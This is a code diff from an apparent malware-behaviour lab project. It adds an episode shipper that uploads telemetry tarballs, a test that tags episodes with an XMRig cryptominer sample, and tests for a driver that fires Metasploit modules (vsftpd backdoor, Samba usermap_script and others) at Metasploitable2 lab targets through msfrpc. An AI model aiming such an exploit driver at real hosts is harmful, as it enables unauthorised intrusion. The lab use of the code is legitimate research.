|
||||
"--ping",
|
||||
action="store_true",
|
||||
help="Hit /v1/ping on the receiver and exit",
|
||||
)
|
||||
parser.add_argument(
|
||||
"--once",
|
||||
action="store_true",
|
||||
help="One scan pass, then exit (default is long-running daemon)",
|
||||
)
|
||||
parser.add_argument("--log-level", default="INFO")
|
||||
args = parser.parse_args(argv)
|
||||
|
||||
_setup_logging(args.log_level)
|
||||
log = logging.getLogger("cis490.shipper")
|
||||
|
||||
try:
|
||||
cfg = ShipperConfig.load(args.config)
|
||||
except (FileNotFoundError, ValueError) as e:
|
||||
log.error("config error: %s", e)
|
||||
return 2
|
||||
|
||||
transport = ShipperTransport(cfg)
|
||||
|
||||
if args.ping:
|
||||
result = transport.ping()
|
||||
# Print structured one-liner for CI / test pipelines.
|
||||
print(json.dumps({
|
||||
"ok": result.ok,
|
||||
"status_code": result.status_code,
|
||||
"host_id": cfg.host_id,
|
||||
"receiver": cfg.receiver.url,
|
||||
"body": result.body,
|
||||
"error": result.error,
|
||||
}))
|
||||
return 0 if result.ok else 1
|
||||
|
||||
queue = ShipperQueue(cfg, transport)
|
||||
if args.once:
|
||||
result = queue.run_once()
|
||||
log.info(
|
||||
"scan complete: scanned=%d shipped=%d transient=%d conflicts=%d fatal=%d",
|
||||
result.scanned, result.shipped, result.transient_failures,
|
||||
result.conflicts, result.fatal,
|
||||
)
|
||||
# Exit code reflects fatal-only; transient failures aren't an error
|
||||
# because the next pass / pod restart will retry.
|
||||
return 1 if result.fatal else 0
|
||||
|
||||
# Daemon mode
|
||||
stopping = False
|
||||
def _stop(signum, frame): # noqa: ARG001
|
||||
nonlocal stopping
|
||||
log.info("received signal %s; finishing pass and exiting", signum)
|
||||
stopping = True
|
||||
signal.signal(signal.SIGTERM, _stop)
|
||||
signal.signal(signal.SIGINT, _stop)
|
||||
|
||||
log.info(
|
||||
"shipper starting: host_id=%s data_root=%s receiver=%s",
|
||||
cfg.host_id, cfg.data_root, cfg.receiver.url,
|
||||
)
|
||||
queue.run_forever(stop_check=lambda: stopping)
|
||||
return 0
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
sys.exit(main())
|
||||
91
shipper/config.py
Normal file
91
shipper/config.py
Normal file
|
|
@ -0,0 +1,91 @@
|
|||
"""Lab-host shipper config — loaded from /etc/cis490/lab-host.toml."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import tomllib
|
||||
from dataclasses import dataclass, field
|
||||
from pathlib import Path
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class ReceiverEndpoint:
|
||||
url: str # e.g. "https://collector.wg"
|
||||
ca_bundle: Path | None = None
|
||||
client_cert: Path | None = None
|
||||
client_key: Path | None = None
|
||||
bearer_token: str | None = None
|
||||
verify_tls: bool = True
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class ShipperConfig:
|
||||
host_id: str
|
||||
data_root: Path # Lab-host data root; episodes/, outbox/, shipped/ live here.
|
||||
receiver: ReceiverEndpoint
|
||||
# Daemon mode: how often to scan for new done.marker files.
|
||||
scan_interval_s: float = 5.0
|
||||
# PUT timeout per episode. Tarballs are bounded by max_episode_bytes;
|
||||
# at WG speeds this is well under 60s for a typical episode.
|
||||
request_timeout_s: float = 60.0
|
||||
# Backoff schedule on transient (5xx / network) failures, in seconds,
|
||||
# capped at the last entry. The shipper's scan loop will pick the
|
||||
# episode up again on the next pass regardless.
|
||||
backoff_seconds: tuple[float, ...] = (1.0, 2.0, 4.0, 8.0, 16.0, 32.0, 60.0, 120.0, 300.0)
|
||||
# Local retention before pruning data/shipped/.
|
||||
keep_local_for_days: int = 7
|
||||
|
||||
@property
|
||||
def episodes_dir(self) -> Path:
|
||||
return self.data_root / "episodes"
|
||||
|
||||
@property
|
||||
def outbox_dir(self) -> Path:
|
||||
return self.data_root / "outbox"
|
||||
|
||||
@property
|
||||
def shipped_dir(self) -> Path:
|
||||
return self.data_root / "shipped"
|
||||
|
||||
@classmethod
|
||||
def load(cls, path: str | Path) -> "ShipperConfig":
|
||||
with open(path, "rb") as f:
|
||||
data = tomllib.load(f)
|
||||
|
||||
host_id = data.get("host_id")
|
||||
if not isinstance(host_id, str) or not host_id:
|
||||
raise ValueError("lab-host config: host_id (string) required at top level")
|
||||
|
||||
paths = data.get("paths", {})
|
||||
data_root = Path(paths.get("data_root", "/var/lib/cis490/data")).resolve()
|
||||
|
||||
rcv = data.get("receiver", {})
|
||||
url = rcv.get("url")
|
||||
if not isinstance(url, str) or not url:
|
||||
raise ValueError("lab-host config: receiver.url required")
|
||||
|
||||
receiver = ReceiverEndpoint(
|
||||
url=url.rstrip("/"),
|
||||
ca_bundle=_optional_path(rcv.get("ca_bundle")),
|
||||
client_cert=_optional_path(rcv.get("client_cert")),
|
||||
client_key=_optional_path(rcv.get("client_key")),
|
||||
bearer_token=rcv.get("bearer_token"),
|
||||
verify_tls=bool(rcv.get("verify_tls", True)),
|
||||
)
|
||||
|
||||
retention = data.get("retention", {})
|
||||
return cls(
|
||||
host_id=host_id,
|
||||
data_root=data_root,
|
||||
receiver=receiver,
|
||||
scan_interval_s=float(data.get("shipper", {}).get("scan_interval_s", 5.0)),
|
||||
request_timeout_s=float(data.get("shipper", {}).get("request_timeout_s", 60.0)),
|
||||
keep_local_for_days=int(retention.get("keep_local_for_days", 7)),
|
||||
)
|
||||
|
||||
|
||||
def _optional_path(v: object) -> Path | None:
|
||||
if v in (None, ""):
|
||||
return None
|
||||
if isinstance(v, str):
|
||||
return Path(v).expanduser()
|
||||
raise TypeError(f"expected path string, got {type(v).__name__}")
|
||||
195
shipper/queue.py
Normal file
195
shipper/queue.py
Normal file
|
|
@ -0,0 +1,195 @@
|
|||
"""Shipper episode queue — scan, compress, ship, retire.
|
||||
|
||||
State machine, mirroring docs/transport.md:
|
||||
|
||||
data/episodes/<id>/done.marker
|
||||
|
|
||||
v
|
||||
tar+zstd → data/outbox/<id>.tar.zst.partial
|
||||
|
|
||||
v
|
||||
rename → data/outbox/<id>.tar.zst
|
||||
|
|
||||
v
|
||||
PUT to receiver
|
||||
|
|
||||
+-- 200/201 → mv data/episodes/<id> → data/shipped/<id>
|
||||
| rm data/outbox/<id>.tar.zst
|
||||
|
|
||||
+-- 409 → leave files in place (the local + remote tarball
|
||||
| differ; manual triage)
|
||||
|
|
||||
+-- 5xx/net → leave outbox tarball; retry on next pass
|
||||
|
|
||||
+-- 4xx → log + skip (caller-side bug, doesn't self-heal)
|
||||
|
||||
Idempotent on every pass. A crash mid-tar leaves only a ``.partial``
|
||||
which the next pass overwrites. A crash mid-PUT leaves the tarball in
|
||||
``outbox/`` and the next pass re-ships it; the receiver responds 200
|
||||
on a matching sha256, 409 on a divergent one.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
import shutil
|
||||
import subprocess
|
||||
import tarfile
|
||||
import tempfile
|
||||
import time
|
||||
from dataclasses import dataclass
|
||||
from pathlib import Path
|
||||
|
||||
from .config import ShipperConfig
|
||||
from .transport import ShipperTransport, ShipResult, hash_file
|
||||
|
||||
|
||||
log = logging.getLogger("cis490.shipper.queue")
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class PassResult:
|
||||
scanned: int
|
||||
shipped: int
|
||||
transient_failures: int
|
||||
conflicts: int
|
||||
fatal: int
|
||||
|
||||
|
||||
class ShipperQueue:
|
||||
def __init__(self, cfg: ShipperConfig, transport: ShipperTransport) -> None:
|
||||
self.cfg = cfg
|
||||
self.transport = transport
|
||||
cfg.episodes_dir.mkdir(parents=True, exist_ok=True)
|
||||
cfg.outbox_dir.mkdir(parents=True, exist_ok=True)
|
||||
cfg.shipped_dir.mkdir(parents=True, exist_ok=True)
|
||||
|
||||
# ---- main entry point ---------------------------------------------
|
||||
|
||||
def run_once(self) -> PassResult:
|
||||
"""One scan pass. Returns counts for logging / tests."""
|
||||
ready = self._ready_episodes()
|
||||
scanned = len(ready)
|
||||
shipped = 0
|
||||
transient = 0
|
||||
conflicts = 0
|
||||
fatal = 0
|
||||
|
||||
for ep_dir in ready:
|
||||
episode_id = ep_dir.name
|
||||
try:
|
||||
tarball, sha = self._tar_episode(ep_dir)
|
||||
except Exception:
|
||||
log.exception("tar failed for %s", episode_id)
|
||||
transient += 1
|
||||
continue
|
||||
|
||||
res = self.transport.ship_tarball(episode_id, tarball, sha)
|
||||
log.info(
|
||||
"ship %s -> %s (%d) %s",
|
||||
episode_id, res.status, res.status_code, res.error or "",
|
||||
)
|
||||
|
||||
if res.status in ("stored", "already-present"):
|
||||
self._retire(ep_dir, tarball)
|
||||
shipped += 1
|
||||
elif res.status == "conflict":
|
||||
conflicts += 1
|
||||
# Keep the tarball + episode dir in place. Operator must
|
||||
# decide whether to drop our copy or fix the remote one.
|
||||
elif res.status == "transient":
|
||||
transient += 1
|
||||
else: # fatal
|
||||
fatal += 1
|
||||
|
||||
return PassResult(
|
||||
scanned=scanned,
|
||||
shipped=shipped,
|
||||
transient_failures=transient,
|
||||
conflicts=conflicts,
|
||||
fatal=fatal,
|
||||
)
|
||||
|
||||
def run_forever(self, *, stop_check=lambda: False) -> None:
|
||||
while not stop_check():
|
||||
try:
|
||||
self.run_once()
|
||||
except Exception:
|
||||
log.exception("scan pass crashed; sleeping anyway")
|
||||
# Coarse sleep: we don't need precise scheduling and we
|
||||
# don't want a tight loop on errors.
|
||||
t0 = time.monotonic()
|
||||
while time.monotonic() - t0 < self.cfg.scan_interval_s:
|
||||
if stop_check():
|
||||
return
|
||||
time.sleep(0.5)
|
||||
|
||||
# ---- internals -----------------------------------------------------
|
||||
|
||||
def _ready_episodes(self) -> list[Path]:
|
||||
out: list[Path] = []
|
||||
if not self.cfg.episodes_dir.exists():
|
||||
return out
|
||||
for ep in sorted(self.cfg.episodes_dir.iterdir()):
|
||||
if ep.is_dir() and (ep / "done.marker").exists():
|
||||
out.append(ep)
|
||||
return out
|
||||
|
||||
def _tar_episode(self, ep_dir: Path) -> tuple[Path, str]:
|
||||
"""Tar+zstd the episode dir into outbox. Idempotent — overwrites
|
||||
any prior partial. Returns ``(tarball_path, sha256_hex)``."""
|
||||
episode_id = ep_dir.name
|
||||
outbox = self.cfg.outbox_dir
|
||||
partial = outbox / f"{episode_id}.tar.zst.partial"
|
||||
final = outbox / f"{episode_id}.tar.zst"
|
||||
|
||||
partial.unlink(missing_ok=True)
|
||||
|
||||
# We use the system `zstd` for streaming compression: pipe a
|
||||
# tar stream into `zstd -T0 -19` to get a deterministic tarball
|
||||
# without buffering the whole tar in memory or pulling in the
|
||||
# python-zstandard dependency. Falls back to in-process `zstd`
|
||||
# via the python wheel if the binary isn't on PATH.
|
||||
if _which_zstd():
|
||||
with partial.open("wb") as zout:
|
||||
proc = subprocess.Popen(
|
||||
["zstd", "-q", "-T0", "-19", "--stdout"],
|
||||
stdin=subprocess.PIPE, stdout=zout,
|
||||
)
|
||||
assert proc.stdin is not None
|
||||
with tarfile.open(fileobj=proc.stdin, mode="w|") as tf:
|
||||
tf.add(ep_dir, arcname=episode_id, recursive=True)
|
||||
proc.stdin.close()
|
||||
rc = proc.wait()
|
||||
if rc != 0:
|
||||
partial.unlink(missing_ok=True)
|
||||
raise RuntimeError(f"zstd exited {rc}")
|
||||
else:
|
||||
# Fallback: pipe through python's built-in zlib via gzip is
|
||||
# NOT compatible (we want zstd). Surface the missing binary
|
||||
# rather than silently producing a non-zstd tarball.
|
||||
partial.unlink(missing_ok=True)
|
||||
raise RuntimeError(
|
||||
"the `zstd` binary is required on the lab host. "
|
||||
"Install it via your package manager."
|
||||
)
|
||||
|
||||
sha = hash_file(partial)
|
||||
partial.replace(final)
|
||||
return final, sha
|
||||
|
||||
def _retire(self, ep_dir: Path, tarball: Path) -> None:
|
||||
"""Move episode dir → shipped/, drop the tarball."""
|
||||
target = self.cfg.shipped_dir / ep_dir.name
|
||||
if target.exists():
|
||||
# Belt-and-suspenders: re-shipping an already-retired
|
||||
# episode shouldn't happen (the dir was moved), but if it
|
||||
# does, prefer the existing copy and just clean up.
|
||||
shutil.rmtree(ep_dir, ignore_errors=True)
|
||||
else:
|
||||
ep_dir.replace(target)
|
||||
tarball.unlink(missing_ok=True)
|
||||
|
||||
|
||||
def _which_zstd() -> bool:
|
||||
return shutil.which("zstd") is not None
|
||||
203
shipper/transport.py
Normal file
203
shipper/transport.py
Normal file
|
|
@ -0,0 +1,203 @@
|
|||
"""HTTP transport for the lab-host shipper.
|
||||
|
||||
Two operations against the receiver:
|
||||
POST /v1/ping — smoke test
|
||||
PUT /v1/episodes/<host>/<episode>.tar.zst — episode upload
|
||||
|
||||
Auth is mTLS (client cert from wg-pki) when configured. A bearer token
|
||||
is supported as a stand-in during early bring-up before the cert is
|
||||
issued; production runs should set both.
|
||||
|
||||
The transport returns small dataclasses rather than throwing — the
|
||||
caller (shipper queue) decides whether to retry, move to shipped/, or
|
||||
alert. This keeps the retry policy in one place.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import hashlib
|
||||
import logging
|
||||
import ssl
|
||||
from dataclasses import dataclass
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
|
||||
import httpx
|
||||
|
||||
from .config import ReceiverEndpoint, ShipperConfig
|
||||
|
||||
|
||||
log = logging.getLogger("cis490.shipper.transport")
|
||||
|
||||
|
||||
SCHEMA_VERSION = 1
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class PingResult:
|
||||
ok: bool
|
||||
status_code: int
|
||||
body: dict[str, Any] | None
|
||||
error: str | None
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class ShipResult:
|
||||
status: str # "stored" | "already-present" | "conflict" | "transient" | "fatal"
|
||||
status_code: int
|
||||
sha256: str | None
|
||||
body: dict[str, Any] | None
|
||||
error: str | None
|
||||
|
||||
|
||||
def _build_ssl_context(rcv: ReceiverEndpoint) -> ssl.SSLContext | bool:
|
||||
"""Build an SSL context honoring the wg-pki CA bundle + client cert.
|
||||
|
||||
Returns True / a bundle path / a context. httpx accepts all three;
|
||||
we use a context so we can attach the client cert for mTLS."""
|
||||
if not rcv.url.lower().startswith("https://"):
|
||||
return False
|
||||
ctx = ssl.create_default_context(
|
||||
cafile=str(rcv.ca_bundle) if rcv.ca_bundle else None,
|
||||
)
|
||||
if not rcv.verify_tls:
|
||||
# Dev-only path; production lab-hosts should always pin the
|
||||
# wg-pki CA. Logged loudly so it doesn't slip through.
|
||||
log.warning("TLS verification disabled — dev-only configuration")
|
||||
ctx.check_hostname = False
|
||||
ctx.verify_mode = ssl.CERT_NONE
|
||||
if rcv.client_cert and rcv.client_key:
|
||||
ctx.load_cert_chain(str(rcv.client_cert), str(rcv.client_key))
|
||||
return ctx
|
||||
|
||||
|
||||
class ShipperTransport:
|
||||
def __init__(self, cfg: ShipperConfig) -> None:
|
||||
self.cfg = cfg
|
||||
self._verify = _build_ssl_context(cfg.receiver)
|
||||
|
||||
# ---- ping ----------------------------------------------------------
|
||||
|
||||
def ping(self) -> PingResult:
|
||||
url = f"{self.cfg.receiver.url}/v1/ping"
|
||||
headers = self._common_headers()
|
||||
try:
|
||||
with httpx.Client(verify=self._verify, timeout=self.cfg.request_timeout_s) as c:
|
||||
r = c.post(url, headers=headers, content=b"")
|
||||
except httpx.HTTPError as e:
|
||||
return PingResult(ok=False, status_code=0, body=None, error=str(e))
|
||||
|
||||
body: dict[str, Any] | None = None
|
||||
try:
|
||||
body = r.json()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
if r.status_code == 200 and isinstance(body, dict) and body.get("ok"):
|
||||
return PingResult(ok=True, status_code=200, body=body, error=None)
|
||||
return PingResult(
|
||||
ok=False,
|
||||
status_code=r.status_code,
|
||||
body=body,
|
||||
error=f"unexpected status {r.status_code}",
|
||||
)
|
||||
|
||||
# ---- ship ----------------------------------------------------------
|
||||
|
||||
def ship_tarball(
|
||||
self,
|
||||
episode_id: str,
|
||||
tarball_path: Path,
|
||||
sha256_hex: str,
|
||||
) -> ShipResult:
|
||||
url = (
|
||||
f"{self.cfg.receiver.url}/v1/episodes/"
|
||||
f"{self.cfg.host_id}/{episode_id}.tar.zst"
|
||||
)
|
||||
size = tarball_path.stat().st_size
|
||||
headers = self._common_headers() | {
|
||||
"Content-Type": "application/zstd",
|
||||
"Content-Length": str(size),
|
||||
"X-Content-SHA256": sha256_hex,
|
||||
"X-Episode-Id": episode_id,
|
||||
}
|
||||
|
||||
try:
|
||||
with httpx.Client(verify=self._verify, timeout=self.cfg.request_timeout_s) as c, \
|
||||
tarball_path.open("rb") as body:
|
||||
# httpx streams from a file-like object via the `content=` kwarg.
|
||||
r = c.put(url, headers=headers, content=body)
|
||||
except httpx.HTTPError as e:
|
||||
return ShipResult(
|
||||
status="transient",
|
||||
status_code=0,
|
||||
sha256=None,
|
||||
body=None,
|
||||
error=str(e),
|
||||
)
|
||||
|
||||
body_json: dict[str, Any] | None = None
|
||||
try:
|
||||
body_json = r.json()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
if r.status_code == 201:
|
||||
return ShipResult(
|
||||
status="stored",
|
||||
status_code=201,
|
||||
sha256=sha256_hex,
|
||||
body=body_json,
|
||||
error=None,
|
||||
)
|
||||
if r.status_code == 200:
|
||||
return ShipResult(
|
||||
status="already-present",
|
||||
status_code=200,
|
||||
sha256=sha256_hex,
|
||||
body=body_json,
|
||||
error=None,
|
||||
)
|
||||
if r.status_code == 409:
|
||||
return ShipResult(
|
||||
status="conflict",
|
||||
status_code=409,
|
||||
sha256=sha256_hex,
|
||||
body=body_json,
|
||||
error="receiver already has a different sha256 for this id",
|
||||
)
|
||||
if 500 <= r.status_code < 600:
|
||||
return ShipResult(
|
||||
status="transient",
|
||||
status_code=r.status_code,
|
||||
sha256=None,
|
||||
body=body_json,
|
||||
error=f"server error {r.status_code}",
|
||||
)
|
||||
# 4xx other than 409: caller-side bug — don't retry.
|
||||
return ShipResult(
|
||||
status="fatal",
|
||||
status_code=r.status_code,
|
||||
sha256=None,
|
||||
body=body_json,
|
||||
error=f"client error {r.status_code}",
|
||||
)
|
||||
|
||||
# ---- helpers -------------------------------------------------------
|
||||
|
||||
def _common_headers(self) -> dict[str, str]:
|
||||
h: dict[str, str] = {
|
||||
"X-Lab-Host": self.cfg.host_id,
|
||||
"X-Schema-Version": str(SCHEMA_VERSION),
|
||||
}
|
||||
if self.cfg.receiver.bearer_token:
|
||||
h["Authorization"] = f"Bearer {self.cfg.receiver.bearer_token}"
|
||||
return h
|
||||
|
||||
|
||||
def hash_file(path: Path) -> str:
|
||||
h = hashlib.sha256()
|
||||
with path.open("rb") as f:
|
||||
for chunk in iter(lambda: f.read(1024 * 1024), b""):
|
||||
h.update(chunk)
|
||||
return h.hexdigest()
|
||||
|
|
@ -74,6 +74,57 @@ def test_episode_id_can_be_overridden(tmp_path: Path) -> None:
|
|||
assert result.episode_dir == tmp_path / "episodes" / "01TEST"
|
||||
|
||||
|
||||
def test_meta_sample_records_full_sample_when_passed(tmp_path: Path) -> None:
|
||||
"""EpisodeConfig.sample → meta.sample carries identity + kind so
|
||||
trainers can join episodes by family/sha256 without re-deriving
|
||||
from events. With no Sample, meta.sample stays null."""
|
||||
import os as _os
|
||||
|
||||
from samples.manifest import Sample
|
||||
|
||||
s = Sample(
|
||||
name="xmrig-cryptominer",
|
||||
family="XMRig",
|
||||
category="cryptominer",
|
||||
profile="cpu-saturate",
|
||||
sha256="abc" * 21 + "d", # 64 hex
|
||||
source="MalwareBazaar",
|
||||
)
|
||||
cfg = EpisodeConfig(
|
||||
target_pid=_os.getpid(),
|
||||
duration_s=0.1,
|
||||
interval_ms=50,
|
||||
data_root=tmp_path,
|
||||
sample=s,
|
||||
)
|
||||
result = EpisodeRunner(cfg).run()
|
||||
|
||||
meta = json.loads((result.episode_dir / "meta.json").read_text())
|
||||
assert meta["sample"] is not None
|
||||
assert meta["sample"]["name"] == "xmrig-cryptominer"
|
||||
assert meta["sample"]["family"] == "XMRig"
|
||||
assert meta["sample"]["category"] == "cryptominer"
|
||||
assert meta["sample"]["profile"] == "cpu-saturate"
|
||||
assert meta["sample"]["kind"] == "real"
|
||||
assert meta["sample"]["sha256"] == "abc" * 21 + "d"
|
||||
|
||||
|
||||
def test_meta_sample_is_null_for_v1_path(tmp_path: Path) -> None:
|
||||
"""No sample passed → the v1 fallback path. meta.sample stays
|
||||
null so trainers can detect (and filter out) info-less runs."""
|
||||
import os as _os
|
||||
|
||||
cfg = EpisodeConfig(
|
||||
target_pid=_os.getpid(),
|
||||
duration_s=0.1,
|
||||
interval_ms=50,
|
||||
data_root=tmp_path,
|
||||
)
|
||||
result = EpisodeRunner(cfg).run()
|
||||
meta = json.loads((result.episode_dir / "meta.json").read_text())
|
||||
assert meta["sample"] is None
|
||||
|
||||
|
||||
def test_episode_writes_done_marker_last(tmp_path: Path) -> None:
|
||||
"""done.marker should not appear until meta.json has ended_at_wall set."""
|
||||
cfg = EpisodeConfig(
|
||||
|
|
|
|||
484
tests/test_exploits.py
Normal file
484
tests/test_exploits.py
Normal file
|
|
@ -0,0 +1,484 @@
|
|||
"""Tests for the Tier-3 exploit driver and its module loader.
|
||||
|
||||
The msfrpc transport itself is exercised against a fake client so the
|
||||
suite runs in-process. A live-msfrpcd integration test is out of
|
||||
scope here — the wire format is small and the high-value coverage is
|
||||
the phase-to-action mapping plus the events the driver emits.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
|
||||
import pytest
|
||||
|
||||
from exploits.driver import DriverConfig, MSFExploitDriver
|
||||
from exploits.modules import ModuleConfig, load_module_config
|
||||
|
||||
|
||||
REPO_ROOT = Path(__file__).resolve().parent.parent
|
||||
MODULES_DIR = REPO_ROOT / "exploits" / "modules"
|
||||
|
||||
|
||||
# -----------------------------------------------------------------------
|
||||
# Module config loader
|
||||
# -----------------------------------------------------------------------
|
||||
|
||||
def test_module_catalog_has_at_least_five_metasploitable2_vectors() -> None:
|
||||
"""The fleet's entry-vector variety depends on the module catalog
|
||||
being populated. Five Metasploitable2 vectors is the minimum
|
||||
that gives the trainer a non-trivial diversity of armed →
|
||||
infecting transition shapes."""
|
||||
from exploits.modules import load_module_configs
|
||||
catalog = load_module_configs(MODULES_DIR)
|
||||
assert len(catalog) >= 5, \
|
||||
f"only {len(catalog)} modules; need at least 5 for fleet variety"
|
||||
names = set(catalog.keys())
|
||||
expected = {
|
||||
"vsftpd_234_backdoor",
|
||||
"samba_usermap_script",
|
||||
"distccd_command_exec",
|
||||
"php_cgi_arg_injection",
|
||||
"unreal_ircd_3281_backdoor",
|
||||
}
|
||||
missing = expected - names
|
||||
assert not missing, f"missing canonical modules: {missing}"
|
||||
|
||||
|
||||
def test_load_vsftpd_module_config_round_trip() -> None:
|
||||
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
|
||||
assert cfg.name == "vsftpd_234_backdoor"
|
||||
assert cfg.module_type == "exploit"
|
||||
assert cfg.module_path == "unix/ftp/vsftpd_234_backdoor"
|
||||
assert cfg.options["RPORT"] == 21
|
||||
assert cfg.options["RHOSTS"] == "{{ target_ip }}"
|
||||
assert cfg.payload_path == "cmd/unix/interact"
|
||||
|
||||
|
||||
def test_render_options_substitutes_target_ip() -> None:
|
||||
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
|
||||
rendered = cfg.render_options(target_ip="10.200.0.10")
|
||||
assert rendered["RHOSTS"] == "10.200.0.10"
|
||||
assert rendered["RPORT"] == 21
|
||||
assert rendered["PAYLOAD"] == "cmd/unix/interact"
|
||||
|
||||
|
||||
def test_select_module_is_deterministic() -> None:
|
||||
from exploits.modules import load_module_configs, select_module
|
||||
catalog = load_module_configs(MODULES_DIR)
|
||||
a = select_module(catalog, host_id="lab-7", slot=2, episode_index=11)
|
||||
b = select_module(catalog, host_id="lab-7", slot=2, episode_index=11)
|
||||
assert a is b
|
||||
|
||||
|
||||
def test_select_module_diversifies_across_hosts() -> None:
|
||||
from exploits.modules import load_module_configs, select_module
|
||||
catalog = load_module_configs(MODULES_DIR)
|
||||
matches = 0
|
||||
for slot in range(20):
|
||||
a = select_module(catalog, host_id="alice", slot=slot, episode_index=0)
|
||||
b = select_module(catalog, host_id="bob", slot=slot, episode_index=0)
|
||||
if a is b:
|
||||
matches += 1
|
||||
assert matches < 15, "host_id seed isn't producing module variety"
|
||||
|
||||
|
||||
def test_select_module_walks_catalog() -> None:
|
||||
from exploits.modules import load_module_configs, select_module
|
||||
catalog = load_module_configs(MODULES_DIR)
|
||||
seen = set()
|
||||
for ep in range(200):
|
||||
seen.add(select_module(catalog, host_id="lab-x", slot=0, episode_index=ep).name)
|
||||
assert seen == set(catalog.keys()), \
|
||||
f"only saw {len(seen)}/{len(catalog)} modules across 200 episodes"
|
||||
|
||||
|
||||
def test_module_target_port_pulls_rport() -> None:
|
||||
from exploits.modules import load_module_configs, module_target_port
|
||||
catalog = load_module_configs(MODULES_DIR)
|
||||
assert module_target_port(catalog["vsftpd_234_backdoor"]) == 21
|
||||
assert module_target_port(catalog["samba_usermap_script"]) == 139
|
||||
assert module_target_port(catalog["distccd_command_exec"]) == 3632
|
||||
assert module_target_port(catalog["php_cgi_arg_injection"]) == 80
|
||||
assert module_target_port(catalog["unreal_ircd_3281_backdoor"]) == 6667
|
||||
|
||||
|
||||
def test_render_options_handles_both_brace_styles(tmp_path: Path) -> None:
|
||||
p = tmp_path / "x.toml"
|
||||
p.write_text(
|
||||
'[module]\n'
|
||||
'type = "exploit"\n'
|
||||
'path = "unix/ftp/example"\n'
|
||||
'[module.options]\n'
|
||||
'RHOSTS = "{{target_ip}}"\n'
|
||||
'LHOST = "{{ target_ip }}"\n'
|
||||
)
|
||||
cfg = load_module_config(p)
|
||||
rendered = cfg.render_options(target_ip="10.0.0.5")
|
||||
assert rendered["RHOSTS"] == "10.0.0.5"
|
||||
assert rendered["LHOST"] == "10.0.0.5"
|
||||
|
||||
|
||||
def test_load_rejects_missing_module_path(tmp_path: Path) -> None:
|
||||
p = tmp_path / "bad.toml"
|
||||
p.write_text('[module]\ntype = "exploit"\n')
|
||||
with pytest.raises(ValueError, match="module.path"):
|
||||
load_module_config(p)
|
||||
|
||||
|
||||
def test_load_rejects_unknown_module_type(tmp_path: Path) -> None:
|
||||
p = tmp_path / "bad.toml"
|
||||
p.write_text(
|
||||
'[module]\ntype = "evil"\npath = "unix/ftp/x"\n'
|
||||
)
|
||||
with pytest.raises(ValueError, match="module.type"):
|
||||
load_module_config(p)
|
||||
|
||||
|
||||
# -----------------------------------------------------------------------
|
||||
# Exploit driver — phase transitions against a fake MSFRpcClient
|
||||
# -----------------------------------------------------------------------
|
||||
|
||||
class FakeMSFRpcClient:
|
||||
"""Stand-in that records every method called and lets a test
|
||||
script the apparent state of msfrpcd (sessions, return values)."""
|
||||
|
||||
def __init__(self, *, sessions_after_fire: dict[int, dict[str, Any]] | None = None) -> None:
|
||||
self.calls: list[tuple[str, tuple, dict]] = []
|
||||
self.logged_in = False
|
||||
self._fired = False
|
||||
self._sessions: dict[int, dict[str, Any]] = {}
|
||||
self._sessions_after_fire = sessions_after_fire or {}
|
||||
self.shell_writes: list[tuple[int, str]] = []
|
||||
|
||||
def _record(self, name: str, *args, **kwargs) -> None:
|
||||
self.calls.append((name, args, kwargs))
|
||||
|
||||
def login(self) -> None:
|
||||
self._record("login")
|
||||
self.logged_in = True
|
||||
|
||||
def logout(self) -> None:
|
||||
self._record("logout")
|
||||
self.logged_in = False
|
||||
|
||||
def session_list(self) -> dict[int, dict[str, Any]]:
|
||||
self._record("session_list")
|
||||
return dict(self._sessions)
|
||||
|
||||
def module_execute(self, mtype: str, mname: str, opts: dict) -> dict:
|
||||
self._record("module_execute", mtype, mname, opts)
|
||||
self._fired = True
|
||||
# Simulate sessions appearing after the exploit fires.
|
||||
self._sessions = dict(self._sessions_after_fire)
|
||||
return {"job_id": 7, "uuid": "fake-uuid"}
|
||||
|
||||
def job_stop(self, job_id) -> dict:
|
||||
self._record("job_stop", job_id)
|
||||
return {"result": "success"}
|
||||
|
||||
def session_shell_write(self, sid: int, data: str) -> dict:
|
||||
self._record("session_shell_write", sid, data)
|
||||
if not data.endswith("\n"):
|
||||
data = data + "\n"
|
||||
self.shell_writes.append((sid, data))
|
||||
return {"write_count": str(len(data))}
|
||||
|
||||
def session_shell_read(self, sid: int) -> str:
|
||||
self._record("session_shell_read", sid)
|
||||
return "uid=0(root) gid=0(root)\n"
|
||||
|
||||
def session_stop(self, sid: int) -> dict:
|
||||
self._record("session_stop", sid)
|
||||
self._sessions.pop(sid, None)
|
||||
return {"result": "success"}
|
||||
|
||||
|
||||
def _make_driver(
|
||||
sessions_after_fire: dict[int, dict[str, Any]] | None = None,
|
||||
target_ip: str = "10.200.0.10",
|
||||
) -> tuple[MSFExploitDriver, FakeMSFRpcClient, list[tuple[str, dict]]]:
|
||||
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
|
||||
client = FakeMSFRpcClient(sessions_after_fire=sessions_after_fire)
|
||||
events: list[tuple[str, dict]] = []
|
||||
|
||||
def emit(event: str, **extra: Any) -> None:
|
||||
events.append((event, extra))
|
||||
|
||||
driver = MSFExploitDriver(
|
||||
client=client, # type: ignore[arg-type]
|
||||
module=cfg,
|
||||
cfg=DriverConfig(
|
||||
target_ip=target_ip,
|
||||
session_open_timeout_s=0.5, # tests must not block
|
||||
),
|
||||
emit_event=emit,
|
||||
)
|
||||
return driver, client, events
|
||||
|
||||
|
||||
def test_driver_setup_authenticates_and_snapshots_sessions() -> None:
|
||||
driver, client, events = _make_driver()
|
||||
